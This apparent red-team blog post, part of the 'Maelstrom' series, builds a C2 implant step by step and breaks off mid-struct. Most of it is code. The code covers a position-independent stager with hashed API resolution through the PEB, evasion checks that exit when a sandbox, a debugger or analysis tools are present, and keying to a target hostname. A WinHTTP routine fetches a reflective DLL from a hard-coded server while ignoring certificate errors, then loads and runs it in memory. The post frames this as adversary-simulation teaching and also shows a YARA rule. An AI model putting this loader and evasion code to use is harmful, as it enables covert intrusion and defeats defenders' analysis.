Maelstrom #4: Writing a C2 Implant

In this blog, we will discuss how to write a C2 implant for the modern era. We will look at the history of offensive techniques and the progress of defence.

Introduction

In the series so far, we have discussed the purpose and intentions behind a C2, and the design considerations for both the implant and server.

In this post, we will move beyond this theoretical discussion and begin building a basic implant. We'll start by looking at the evolution of offensive and defensive techniques since 2010, to give us context and understanding of the current landscape. We'll then, as with our previous posts, discuss some important concepts that we'll be incorporating into the implant. Finally, we'll walk through the implant design, writing the base of both stage0 and stage1 of the implant for our exemplar C2, Maelstrom.

    public void ExecuteCommand(String command)
    {
       Process p = new Process();
       ProcessStartInfo startInfo = new ProcessStartInfo();
       startInfo.FileName = "cmd.exe";
       startInfo.Arguments = @"/c " + command; // cmd.exe specific implementation
       p.StartInfo = startInfo;
       p.Start();
    }

Objectives

This post will cover:

The background and development of offensive and defensive techniques around implants.
The functions and code required for a contemporary Stage 0, including:
- Environmental Keying
- Detecting Suspicious Processes
- Anti-Sandbox Protections
- Anti-Debug Protections
The functions and code required for a contemporary Stage 1, including:
- Reflective Loading
- DLL Debugging
- Server Checkins
- Sleeping

As we've mentioned in a similar paragraph in every blog post so far, and will continue to mention in every post after this one, the code will serve to illustrate the functionality, but is far from being immediately usable within a functional C2.

Stage 0:

Environmental Keying
Detecting Suspicious Processes
Anti-Sandbox
Anti-Debug

Stage 1:

Checking-in to the server

Evolution of Offensive and Defensive Techniques

Over the years, code execution has gotten more and more complicated as defensive techniques and processes improved, requiring more sophisticated approaches. In this section, we want to nail down the evolution and history of both offence and defence within this space. By doing so, we hope to build an understanding of why some behaviours are absolutely necessary in today's red team environment.

While some implants may be anti-virus proof, able to run without detection and execute commands within a system, this is a far cry from being able to operate as a viable C2 within a network with an up-to-date EDR and a correctly configured SIEM. Indeed, without these behaviours in place, a red team is unlikely to provide value to an organisation, as many of its recommendations will simply be inapplicable to a network with that level of maturity.

2010s

-> implant.exe
  -> cmd.exe
    -> whoami.exe

2014 - 2016

2017 - 2019

2019 - 2020

Finally, Cobalt Strike 4.0 introduces an internal inline-execute post-exploitation pattern. Inline-execute passes a capability to Beacon as needed, executes it inline, and cleans up the capability after it ran. This post-exploitation interface paves the way for future features that execute within Beacon’s process context without bloating the agent itself.

A Beacon Object File (BOF) is a compiled C program, written to a convention that allows it to execute within a Beacon process and use internal Beacon APIs. BOFs are a way to rapidly extend the Beacon agent with new post-exploitation features.

TrustedSec then went on to produce:

Around the same time, people began reinterpreting the execute-assembly function by rewriting the CLR and executing it as a RDLL:

2022

Cobalt Strike for many years, in our experience at any rate, was the C2. Even with the growth of other C2s, Cobalt Strike remains the C2 that C2s are compared to, the Sennheiser HD600's of the offensive tools. Cobalt Strike's interface and operation (and Armitage before it) remain "what a C2 looks like", at least in our minds. Although we've not seen many imitate the device canvas (or, sadly, the lightning).

While there are arguments to be made for other projects, Cobalt Strike has been steering the industry, for both Offence and Defence, for years. The frequent and information dense blogs and videos helped both offensive and defensive teams improve their techniques in a way that few other vendors have done.

Researchers worked on "How to improve X in Cobalt Strike" for a long time, and the change to actually building new and unique tooling has only shifted over the past few years. For defensive teams, Cobalt Strike is still frequently seen and will be for a while. This comes from its leaks and cracks over the years and its continued effectiveness.

Both of these offer advanced evasive technology baked into the product, and are aimed at working in sophisticated environments with high levels of protection in place.

In the next two blogs, we will look at implementing a few of these techniques. Namely, ETWTi, Userland hooks, ETW, AMSI and memory sweeps.

Important Concepts

In this section, we want to outline a few topics that will come up when building out the implant so that they make sense and we can demonstrate the implant effectively.

OS Shell Commands

When discussing OS Shell Commands, we don't mean just cmd.exe. This is anything that causes a child process to spawn to run the command; every language has its equivalent. To name a few:

Fundamentally, Windows cannot block the features that Windows itself has to use. Because these calls are so ubiquitous, with every feature in Windows making use of them, monitoring them now relies on EDR hooks and callbacks.

WinAPI

LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

For now, though, the WINAPI is giving us access to calls that will make this entire process easier.

Process Environment Block

Process Name
Location
Is it being debugged
Loaded modules
Environment Path
Etc

This is all stored in a structure like so:

typedef struct _PEB {
  BYTE                          Reserved1[2];
  BYTE                          BeingDebugged;
  BYTE                          Reserved2[1];
  PVOID                         Reserved3[2];
  PPEB_LDR_DATA                 Ldr;
  PRTL_USER_PROCESS_PARAMETERS  ProcessParameters;
  PVOID                         Reserved4[3];
  PVOID                         AtlThunkSListPtr;
  PVOID                         Reserved5;
  ULONG                         Reserved6;
  PVOID                         Reserved7;
  ULONG                         Reserved8;
  ULONG                         AtlThunkSListPtr32;
  PVOID                         Reserved9[45];
  BYTE                          Reserved10[96];
  PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
  BYTE                          Reserved11[128];
  PVOID                         Reserved12[1];
  ULONG                         SessionId;
} PEB, *PPEB;

Throughout this blog, we will interact with the PEB a lot, mainly to enumerate loaded modules and such. As this is a pretty extensive topic, we won't discuss it all, and we have some recommended reads. But for now, know the PEB as the structure upon which the process is built.

Position Independent Code

When we talk about Position Independent Code, we are talking about C code that is written in a very specific way, with additional restrictions. The goal is to have all the code we plan to execute inside the .text section of the PE.

Writing C normally will cause different parts of the code to be stored in different sections:

Global Variables in .bss
Imported DLLs in .idata
Exports in .edata
CHAR* and WCHAR* in .rdata

Even with all those limitations, we can still achieve our goal. We just need to write code in a very specific way to avoid these different section allocations. By doing so, we ensure all the code is in the .text section. We need this because that is the section required for storing all of the binary code. If part of the code is in .bss, then it will crash because we're only going to extract the .text.

For example, let's assume this string:

const char* String = "hello world";

Because this is read-only initialised data, it goes into .rdata. To get this to be PIC, we write it as such:

char String[] = {'a', 'b', 'c', 0};

What if we want to use VirtualAlloc? If it's just called as is, then it will have Kernel32 as an import. To get around this, we will need to dynamically load the DLL, and then resolve the address (more on this later).

One final note, to ensure we don't have CRT controlling the execution flow of the PE, we need to make sure that the entry-point is not main or some other form of winmain, wmain, etc. We will show this later on in the Makefile.

Supporting Post Exploitation

When discussing implants, there are several methods of supporting post-exploitation utilities. For the most part, implants will have the majority of their functionality embedded in the implant. So, when the implant receives a command, the command will go through some sort of switch statement:

switch (job) {
    case 1:
        whoami();
        break;
    case 2:
        hostname();
        break;
}

Alternatively, the implant could work as a loader; supporting:

This ensures that the actual implant is significantly smaller, and all functionality is modular. However, this comes at the cost of constant memory allocations for each job. The method chosen is entirely dependent on the use case, but it is a choice that should be addressed. For us, we will stick to the traditional variant with all functionality embedded.

Types of implants

Position Independent

// Copy the shellcode into it.
memcpy( pBuffer, shellcode_bin, shellcode_bin_len );

// Make a function pointer to the run function shellcode.
fprun Run = ( fprun )pBuffer;

Dynamic Link Library

HMODULE hModule = LoadLibraryA("c:\\implant.dll");

The issue here is that LoadLibraryA requires the DLL to be on disk, which would break the golden rule of OpSec: Don't write to disk. Doing so will leave artifacts behind, allowing the implant to be signatured and resulting in more time spent trying to break the signature.

The Golden Rule of OpSec: Don't write to disk!*
* Unless you need to, or unless you know how to avoid the detection, or... except... and... ... other caveats

Reflective DLLs

Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.

Essentially, what's going to happen is the RDLL will be allocated similarly to typical shellcode:

Once the exported address has been found, the offset is added to the base address of the allocated space for the RDLL. Like so:

LPVOID lpBuffer = NULL /* This will be the buffer containing the RDLL */;
DWORD dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
LPVOID lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); 
LPVOID lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );

First off, lpBuffer can come from anywhere: downloaded from the internet, read from a file, etc. For an implant, it's likely downloaded over some sort of channel (HTTP).
The buffer is then walked to find the offset of the exported function.
With the offset determined and stored in dwReflectiveLoaderOffset, lpRemoteLibraryBuffer holds the base address returned from VirtualAllocEx.
Once the space is allocated and the export offset found, the two can be added together to get the address of the exported function.

All that needs to happen now is for the thread to be created at this point to execute the loader:

hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );

import "pe"
rule ReflectiveLoader
{
    meta: description = "Detects a unspecified hack tool, crack or malware using a reflective loader  no hard match  further investigation recommended"
    reference = "Internal Research"
    score = 60
    strings:
        $s1 = "ReflectiveLoader" fullword ascii
        $s2 = "ReflectivLoader.dll" fullword ascii
        $s3 = "?ReflectiveLoader@@" ascii
    condition:
    uint16(0) == 0x5a4d and ( 1 of them or pe.exports("ReflectiveLoader") or pe.exports("_ReflectiveLoader@4") or pe.exports("?ReflectiveLoader@@YGKPAX@Z") )
}

This is the technique we will follow for Maelstrom.

Recap of the Execution Flow

Stage 0: A Position Independent Loader
Stage 1: Reflective DLL

By making the stage 0 loader PIC, we can wrap it into any other form of loader required. Once the Stage 0 executes, it will load a Reflective DLL which will be the main implant (Stage 1).

Simple.

Stage 0

Maelstrom WinAPI Resolution

FARPROC GetSymbolAddress(HANDLE hModule, LPCSTR lpProcName) {
    UINT64 uiModuleAddress = (UINT64)hModule;
    UINT64 uiSymbolAddress = 0;
    UINT64 uiExportedAddressTable = 0;
    UINT64 uiNamePointerTable = 0;
    UINT64 uiOrdinalTable = 0;

    if (hModule == NULL) {
        return 0;
    }

    PIMAGE_NT_HEADERS NtHeaders = (PIMAGE_NT_HEADERS)(uiModuleAddress + ((PIMAGE_DOS_HEADER)uiModuleAddress)->e_lfanew);
    PIMAGE_DATA_DIRECTORY DataDir = (PIMAGE_DATA_DIRECTORY)&NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    PIMAGE_EXPORT_DIRECTORY ExportDir = (PIMAGE_EXPORT_DIRECTORY)(uiModuleAddress + DataDir->VirtualAddress);

    uiExportedAddressTable = (uiModuleAddress + ExportDir->AddressOfFunctions);
    uiNamePointerTable = (uiModuleAddress + ExportDir->AddressOfNames);
    uiOrdinalTable = (uiModuleAddress + ExportDir->AddressOfNameOrdinals);

    if (((UINT64)lpProcName & 0xFFFF0000) == 0x00000000) {
        uiExportedAddressTable += ((IMAGE_ORDINAL((UINT64)lpProcName) - ExportDir->Base) * sizeof(DWORD));
        uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
    }
    else {
        DWORD dwCounter = ExportDir->NumberOfNames;
        while (dwCounter--) {
            char* cpExportedFunctionName = (char*)(uiModuleAddress + DEREF_32(uiNamePointerTable));
            if (STRCMP(cpExportedFunctionName, lpProcName) == 0) {
                uiExportedAddressTable += (DEREF_16(uiOrdinalTable) * sizeof(DWORD));
                uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
                break;
            }
            uiNamePointerTable += sizeof(DWORD);
            uiOrdinalTable += sizeof(WORD);
        }
    }

    return (FARPROC)uiSymbolAddress;
}

First, pass in a module base address and cast it to uiModuleAddress:

UINT64 uiModuleAddress = (UINT64)hModule;

This is then used to identify the Export Directory; again, this is a standard technique:

PIMAGE_NT_HEADERS NtHeaders = (PIMAGE_NT_HEADERS)(uiModuleAddress + ((PIMAGE_DOS_HEADER)uiModuleAddress)->e_lfanew);
PIMAGE_DATA_DIRECTORY DataDir = (PIMAGE_DATA_DIRECTORY)&NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
PIMAGE_EXPORT_DIRECTORY ExportDir = (PIMAGE_EXPORT_DIRECTORY)(uiModuleAddress + DataDir->VirtualAddress);

Locate the NT Headers by adding the e_lfanew field of the DOS Header to the module base address. Then, from the NT Headers, take the export entry of the Data Directory. Finally, get the Export Directory itself by adding that entry's virtual address to the module base. Access to the Export Directory has now been achieved.

Now it is just a case of looping through all the exported functions from that directory until the strings match:

DWORD dwCounter = ExportDir->NumberOfNames;
while (dwCounter--) {
    char* cpExportedFunctionName = (char*)(uiModuleAddress + DEREF_32(uiNamePointerTable));
    if (STRCMP(cpExportedFunctionName, lpProcName) == 0) {
        uiExportedAddressTable += (DEREF_16(uiOrdinalTable) * sizeof(DWORD));
        uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
        break;
    }
    uiNamePointerTable += sizeof(DWORD);
    uiOrdinalTable += sizeof(WORD);
}

int STRCMP(const char* p1, const char* p2)
{
    const unsigned char* s1 = (const unsigned char*)p1;
    const unsigned char* s2 = (const unsigned char*)p2;
    unsigned char c1, c2;
    do
    {
        c1 = (unsigned char)*s1++;
        c2 = (unsigned char)*s2++;
        if (c1 == '\0')
            return c1 - c2;
    } while (c1 == c2);
    return c1 - c2;
}

void* MEMSET2(void* dest, int val, size_t len)
{
    unsigned char* ptr = dest;
    while (len-- > 0)
        *ptr++ = val;
    return dest;
}

When STRCMP matches, we return the symbolAddress after the break:

return (FARPROC)uiSymbolAddress;
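
The relationship between the three export tables (names, name ordinals, and function addresses) is easy to lose in the pointer arithmetic. The following is a minimal sketch of the same lookup over plain arrays. MockExports and MockLookupRva are hypothetical names used only for illustration, and the sketch uses the CRT strcmp for brevity, so it is not written in the position independent style used by the stager:

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for the three export tables of a PE image. */
typedef struct {
    const char *const *names;  /* plays the role of AddressOfNames */
    const uint16_t *ordinals;  /* AddressOfNameOrdinals: index into functions */
    const uint32_t *functions; /* AddressOfFunctions: one RVA per export */
    uint32_t numberOfNames;
} MockExports;

/* Returns the RVA of the named export, or 0 if the name is not present. */
uint32_t MockLookupRva(const MockExports *exports, const char *name)
{
    for (uint32_t i = 0; i < exports->numberOfNames; i++) {
        if (strcmp(exports->names[i], name) == 0) {
            /* The name index selects an ordinal, and the ordinal selects the RVA. */
            return exports->functions[exports->ordinals[i]];
        }
    }
    return 0;
}
```

The point to take away is that the name index is never used directly against the function table; it always goes through the ordinal table first, which is what the DEREF_16(uiOrdinalTable) step does in GetSymbolAddress.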

So where is the module base address coming from? Well:

LPVOID GetKernel32() {
    LPVOID pKernel32Dll = NULL;
    pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH1);
    if (NULL == pKernel32Dll) {
        pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH2);
        if (NULL == pKernel32Dll) {
            pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH3);
            if (NULL == pKernel32Dll) {
                return NULL;
            }
        }
    }
    return pKernel32Dll;
}

Three DJB2 hashes are defined:

#define KERNEL32DLL_HASH1   0xa709e74f /// Hash of KERNEL32.DLL
#define KERNEL32DLL_HASH2   0xa96f406f /// Hash of kernel32.dll
#define KERNEL32DLL_HASH3   0x8b03944f /// Hash of Kernel32.dll
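
The body of Djb2HashW is not shown in this post, so the following is only a sketch of the textbook DJB2 algorithm over a wide string. Djb2HashWSketch is a hypothetical name, wchar_t stands in for WCHAR, and this variant is an assumption that may not reproduce the exact hash values defined above:

```c
#include <stddef.h>
#include <stdint.h>

/* Textbook DJB2: start at 5381, then hash = hash * 33 + c for each character. */
uint32_t Djb2HashWSketch(const wchar_t *s)
{
    uint32_t hash = 5381;
    while (*s != L'\0') {
        hash = ((hash << 5) + hash) + (uint32_t)*s; /* hash * 33 + c */
        s++;
    }
    return hash;
}
```

Because the hash is case sensitive, "KERNEL32.DLL", "kernel32.dll" and "Kernel32.dll" all produce different values, which is why three separate hashes are tried in turn.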

Then, parsing the PEB we can obtain the DLLBase:

LPVOID GetModuleByHash(UINT uiModuleHash) {
    PEB* peb = (PEB*)PPEB_PTR;
    if (NULL == peb) {
        return NULL;
    }

    PEB_LDR_DATA* pLdr = peb->Ldr;
    LIST_ENTRY* pListHead = &(pLdr->InMemoryOrderModuleList);
    LIST_ENTRY* pListEntry = NULL;
    LDR_DATA_TABLE_ENTRY_COMPLETED* pLdrEntry;

    for (pListEntry = pListHead->Flink; pListEntry != pListHead; pListEntry = pListEntry->Flink) {
        pLdrEntry = (LDR_DATA_TABLE_ENTRY_COMPLETED*)((PCHAR)pListEntry - sizeof(LIST_ENTRY));
        WCHAR* pwDllName = pLdrEntry->BaseDllName.Buffer;
        UINT wHash = Djb2HashW(pwDllName);
        if (wHash == uiModuleHash) {
            return pLdrEntry->DllBase;
        }
    }
    return NULL;
}

First off, get the PEB Struct:

PEB* peb = (PEB*)PPEB_PTR;

Where PPEB_PTR is:

#define PPEB_PTR __readgsqword(0x60)

PEB_LDR_DATA* pLdr = peb->Ldr;

Then get access to the module list:

LIST_ENTRY* pListHead = &(pLdr->InMemoryOrderModuleList);
LIST_ENTRY* pListEntry = NULL;
LDR_DATA_TABLE_ENTRY_COMPLETED* pLdrEntry;

As seen in the struct:

typedef struct _PEB_LDR_DATA {
  BYTE       Reserved1[8];
  PVOID      Reserved2[3];
  LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

Then loop over it until the hashes match. When they do, that will be the DLL required.

Now it's a case of casting to the function type, but before that, here is how the APIs are stored:

typedef struct API_ {
    LPVOID LoadLibraryA;
    LPVOID CloseHandle;
    LPVOID GlobalMemoryStatusEx;
    LPVOID CreateToolhelp32Snapshot;
    LPVOID Process32NextW;
    LPVOID Process32FirstW;
    LPVOID GetComputerNameW;
    LPVOID Sleep;
    LPVOID WinHttpCloseHandle;
    LPVOID WinHttpQueryDataAvailable;
    LPVOID WinHttpQueryHeaders;
    LPVOID WinHttpReadData;
    LPVOID WinHttpReceiveResponse;
    LPVOID WinHttpSendRequest;
    LPVOID WinHttpSetOption;
    LPVOID WinHttpConnect;
    LPVOID WinHttpOpen;
    LPVOID WinHttpOpenRequest;
    LPVOID WinHttpAddRequestHeaders;
    LPVOID GlobalFree;
    LPVOID malloc;
    LPVOID free;
    LPVOID memset;
    LPVOID VirtualProtect;
    LPVOID VirtualAlloc;
    LPVOID CreateThread;
    LPVOID WaitForSingleObject;
    LPVOID VirtualFree;
} API, *PAPI;

In the case of LoadLibraryA:

typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR lpLibFileName);
CHAR cLoadLibraryA[13] = { 'L', 'o', 'a', 'd','L','i','b','r','a','r','y','A',0 };
Api->LoadLibraryA = GetSymbolAddress(hKernel32, cLoadLibraryA);

Then using it:

CHAR cWinHTTP[8] = { 'w','i','n','h','t','t','p',0 };
HMODULE hWinHttp = ((LOADLIBRARYA)api.LoadLibraryA)(cWinHTTP);

Now onto the stager!

Quick recap of Stage 0. Before running malicious code on a host to get an implant, some initial enumeration and checks are going to be put into place. For an Adversary Simulation exercise, this keeps the attackers within scope, whilst also ensuring that the implant is only executed when it is safe to do so.

Additionally, this entry point will all be Position Independent; meaning that all of the code will be within the .text section, allowing for the opcodes to be extracted, thus giving shellcode to execute in other methods.

Functionality

In this section, we want to discuss some functionality that can be added to a stage 0. Obviously, it doesn't ALL need to go in, but it's just some things we found interesting and/or useful.

Environmental Keying

If the Environmental information embedded in the stager does not match what was enumerated, then return.
Encrypt the stage 1 DLL with some information obtained from the environment, and decrypt it at runtime.

The second point can be completely automated. This is not something done in Maelstrom, but it is easy to send some information back to the C2 and then encrypt the DLL with that information before returning it to the stager.

As far as methods of doing this go, there are a ton and, quite frankly, it's down to creativity. A few examples can be shown here:

In the case of Maelstrom, we simply hash the computername and check it with this function:

BOOL IsCorrectEnvironment(API api) {
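    // GetComputerNameW needs room for the terminating null and takes its size in characters, not bytes.
    WCHAR wHostname[MAX_COMPUTERNAME_LENGTH + 1];
    DWORD dwSz = MAX_COMPUTERNAME_LENGTH + 1;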

    if (((GETCOMPUTERNAMEW)api.GetComputerNameW)(wHostname, &dwSz)) {
        if (Djb2HashW(wHostname) == HOSTNAME_HASH) {
            return TRUE;
        }
    }
    return FALSE;
}

Which is called like so:

if (IsCorrectEnvironment(Api) == FALSE) {
    return FALSE;
}

So, back to the keying. If the computer name doesn't match, the check returns FALSE and the stager exits. Otherwise, it moves on.

Detecting Suspicious Processes

This is a fun one: it adds an extra layer of hindrance for blue teams. It's quite simple: if a process is found, exit. In the following example only one process is being checked for, but it's no extra trouble to loop over a bunch:

BOOL AreSuspiciousProcessesRunning(API Api) {
    HANDLE hSnapshot;
    PROCESSENTRY32W pe32;

    hSnapshot = ((CREATETOOLHELP32SNAPSHOT)Api.CreateToolhelp32Snapshot)(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        return FALSE;
    }

    pe32.dwSize = sizeof(PROCESSENTRY32W);

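    if (!((PROCESS32FIRSTW)Api.Process32FirstW)(hSnapshot, &pe32)) {
        // Close the snapshot handle before bailing out.
        ((CLOSEHANDLE)Api.CloseHandle)(hSnapshot);
        return FALSE;
    }

    do {
        if (Djb2HashW(pe32.szExeFile) == PROCESS_HACKER_HASH) {
            // Close the snapshot handle before the early return.
            ((CLOSEHANDLE)Api.CloseHandle)(hSnapshot);
            return TRUE;
        }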
    } while (((PROCESS32NEXTW)Api.Process32NextW)(hSnapshot, &pe32));

    ((CLOSEHANDLE)Api.CloseHandle)(hSnapshot);
    return FALSE;
}

Loop over all processes; if the hashed name of a process is the same as the one defined, then return TRUE. In this case, it is ProcessHacker.exe:

#define PROCESS_HACKER_HASH 0xda24bd3c

This is executed like so:

if (AreSuspiciousProcessesRunning(Api)) {
    return FALSE;
}

Anti-Sandbox

Sandboxes are a great way to automate the identification of malware's purpose. Essentially, they run malware inside an isolated virtual machine, watch its behaviour, and report on it.

Commonly, these are small virtual machines with a limited amount of time they can wait. Some common solutions to handling sandboxes:

Waiting for the expiration time (usually 180 seconds)
Only executing if not in a virtual machine
Only executing if a disk size is above a certain threshold

These are just a few to consider. In the case of Maelstrom, we simply check that the RAM size is greater than 4 GB:

BOOL IsInSandbox(API Api) {
    MEMORYSTATUSEX memStatus;

    memStatus.dwLength = sizeof(memStatus);

    ((GLOBALMEMORYSTATUSEX)Api.GlobalMemoryStatusEx)(&memStatus);
    float fSz = (float)memStatus.ullTotalPhys / (1024 * 1024 * 1024);
    if (fSz > 4) {
        return FALSE;
    }
    return TRUE;
}

If this function returns FALSE, then we continue.

Combined with a sleep:

void InternalSleep(API Api, DWORD DwSleep) {
    ((SLEEP)Api.Sleep)(DwSleep);
}

Anti-Debug

BOOL IsBeingDebugged() {
    PPEB pPeb = (PPEB)PPEB_PTR;

    if (pPeb->BeingDebugged == 1) {
        return TRUE;
    }
    else {
        return FALSE;
    }
}

These techniques are useful for hindering blue teams if the payload is retrieved; they slow down identification of the malware's purpose, as well as of the server behind it. This should not be the only method of doing this. For example, if it is debugged and the IPs of the server are found, then there should be server side protections to control which implants are allowed to communicate with the server.

Downloading the Reflective DLL

typedef struct DLL_ {
    LPVOID Buffer;
    DWORD Size;
} DLL, *PDLL;

And then passed into the function:

BOOL GetReflectiveDLL(API api, PDLL Dll)

We'll get to that shortly. But first, the config of the request is defined:

WCHAR wVerb[4] = {
  'G', 'E', 'T', 0
};

WCHAR wEndpoint[9] = {
  '/', 'a', '?', 's', 't', 'a', 'g', 'e', 0
};

WCHAR wUserAgent[10] = {
  'M', 'a', 'e', 'l', 's', 't', 'r', 'o', 'm', 0
};

WCHAR wVersion[5] = {
  'H', 'T', 'T', 'P', 0
};

WCHAR wServer[13] = {
  '1', '0', '.', '1', '0', '.', '1', '1', '.', '2', '0', '5', 0
};

WCHAR wReferer[19] = {
  'h', 't', 't', 'p', 's', ':', '/', '/', 'g', 'o', 'o', 'g', 'l', 'e', '.', 'c', 'o', 'm', 0
};

WCHAR wHeaders[22] = {
  'X', '-', 'M', 'a', 'e', 'l', 's', 't', 'r', 'o', 'm', ':', ' ', 'p', 'a', 's', 's', 'w', 'o', 'r', 'd', 0
};

These strings are hard-coded in the function, which does not support any sort of update. Also, the password that the server requires is hard-coded in the header. Finally, these strings are in the array format so that they are placed within the .text section.

We now create a few variables, including the port:

DWORD dwPort = 5555;
BOOL bSSL = FALSE;
BOOL bProxy = FALSE;

DWORD dwSz = 0;
DWORD dwDownloaded = 0;
DWORD dwTotalRead = 0;
long lpBuffer = -1;
DWORD lpdwBufferLength = sizeof(lpBuffer);
BOOL bSetOptions = FALSE;

DWORD dwFlagsWinHttpOpenRequest = 0;
DWORD dwAllowBadCerts = 0;

HINTERNET hSession = NULL;
HINTERNET hConnect = NULL;
HINTERNET hRequest = NULL;
BOOL bSentRequest = FALSE;
BOOL bReceieveRequest = FALSE;
BOOL bHeadersQueried = FALSE;
BOOL bHeadersAdded = FALSE;
WINHTTP_AUTOPROXY_OPTIONS autoProxyOptions;
WINHTTP_PROXY_INFO proxyInfo;
DWORD dwProxyInfoSz = sizeof(proxyInfo);

We aren't going to step through the code, but there are a few things to point out.

If it's SSL, set these flags:

if (bSSL) {
    dwFlagsWinHttpOpenRequest = WINHTTP_FLAG_SECURE;
    dwAllowBadCerts = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE;
}

And:

if (bSSL) {
    bSetOptions = ((WINHTTPSETOPTION)api.WinHttpSetOption)(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &dwAllowBadCerts, sizeof(dwAllowBadCerts));
    if (bSetOptions == FALSE) {
        return FALSE;
    }
}

Then, this is how headers are added:

bHeadersAdded = ((WINHTTPADDREQUESTHEADERS)api.WinHttpAddRequestHeaders)(hRequest, (LPCWSTR)&wHeaders, (DWORD)-1, WINHTTP_ADDREQ_FLAG_REPLACE | WINHTTP_ADDREQ_FLAG_ADD);
if (bHeadersAdded == FALSE) {
    return FALSE;
}

If multiple headers are required, then the WCHAR string needs to contain all of them, with each header except the last terminated by \r\n (CR/LF).
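
To illustrate the expected layout of a multi-header string, here is a minimal sketch that joins several header lines with CR/LF between them. JoinHeaders is a hypothetical helper, not part of Maelstrom, and it leans on the CRT (wcslen, wmemcpy) for brevity, so it is not position independent as written:

```c
#include <stddef.h>
#include <wchar.h>

/* Hypothetical helper: writes the headers into out, separated by CR/LF.
 * The last header is left unterminated. Returns the number of characters
 * written (excluding the null), or 0 if out is too small. */
size_t JoinHeaders(const wchar_t *const *headers, size_t count,
                   wchar_t *out, size_t outLen)
{
    size_t used = 0;

    if (out == NULL || outLen == 0) {
        return 0;
    }
    out[0] = L'\0';

    for (size_t i = 0; i < count; i++) {
        size_t len = wcslen(headers[i]);
        size_t sep = (i + 1 < count) ? 2 : 0; /* CR/LF between headers only */

        if (used + len + sep + 1 > outLen) {
            out[0] = L'\0';
            return 0;
        }
        wmemcpy(out + used, headers[i], len);
        used += len;
        if (sep != 0) {
            out[used++] = L'\r';
            out[used++] = L'\n';
        }
    }
    out[used] = L'\0';
    return used;
}
```

The resulting buffer could then be passed as the header string in a single call, rather than calling the add-headers function once per header.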

After the request is done, we fill the structure:

Dll->Buffer = Buffer;
Dll->Size = dwTotalRead;

if (Dll->Size > 0) {
    return TRUE;
}
else {
    return FALSE;
}

The entire process is encapsulated in the following call:

if (GetReflectiveDLL(Api, &Dll) == FALSE) {
    return -1;
}

In the stage 1 section we will discuss why a Reflective DLL was chosen and what it is, but for now let's discuss how it will be loaded. For reference, here is the code used to execute the DLL:

int LoadReflectiveDll(API Api, DLL Dll) {
    LPVOID pAddress = NULL;
    DWORD lpflOldProtect = 0;
    BOOL bProtect = FALSE;
    DWORD dwLdrOffset = 0;
    PTHREAD_START_ROUTINE pRoutine = NULL;
    HANDLE hThread = NULL;

    pAddress = ((VIRTUALALLOC)Api.VirtualAlloc)(0, Dll.Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    if (pAddress == NULL) {
        return 1;
    }

    Memcpy(pAddress, Dll.Buffer, Dll.Size);

    bProtect = ((VIRTUALPROTECT)Api.VirtualProtect)(pAddress, Dll.Size, PAGE_EXECUTE_READ, &lpflOldProtect);
    if (bProtect == FALSE) {
        return 1;
    }

    dwLdrOffset = GetReflectiveLoaderOffset(Dll.Buffer);
    if (dwLdrOffset == 0) {
        return 1;
    }

    pRoutine = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

    hThread = ((CREATETHREAD)Api.CreateThread)(NULL, 0, pRoutine, NULL, 0, NULL);
    if (hThread == NULL) {
        return 1;
    }
    ((WAITFORSINGLEOBJECT)Api.WaitForSingleObject)(hThread, INFINITE);

    ((VIRTUALFREE)Api.VirtualFree)(pAddress, 0, MEM_RELEASE);
    return 0;
}

void * Memcpy (void *dest, const void *src, size_t len)
{
  char *d = dest;
  const char *s = src;
  while (len--)
    *d++ = *s++;
  return dest;
}

We discussed this earlier on, but let's revisit. We first need to identify the offset of the exported function so we can get the proper address to start a thread on the function:

dwLdrOffset = GetReflectiveLoaderOffset(Dll.Buffer);
if (dwLdrOffset == 0) {
    return 1;
}

pRoutine = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

Let's go over the GetReflectiveLoaderOffset() function.

The function is declared like so:

DWORD GetReflectiveLoaderOffset(VOID* lpReflectiveDllBuffer)

The parameter taken in here is the buffer containing the DLL retrieved from the server.

First things first, define the exported function name:

CHAR cReflectiveLoader[17] = {
    'R', 'e', 'f', 'l', 'e', 'c', 't', 'i', 'v', 'e', 'L', 'o', 'a', 'd', 'e', 'r', 0
};

uExportDirectory = uBase + ((PIMAGE_DOS_HEADER)uBase)->e_lfanew;

The struct:

typedef struct _IMAGE_DOS_HEADER
{
     WORD e_magic;
     WORD e_cblp;
     WORD e_cp;
     WORD e_crlc;
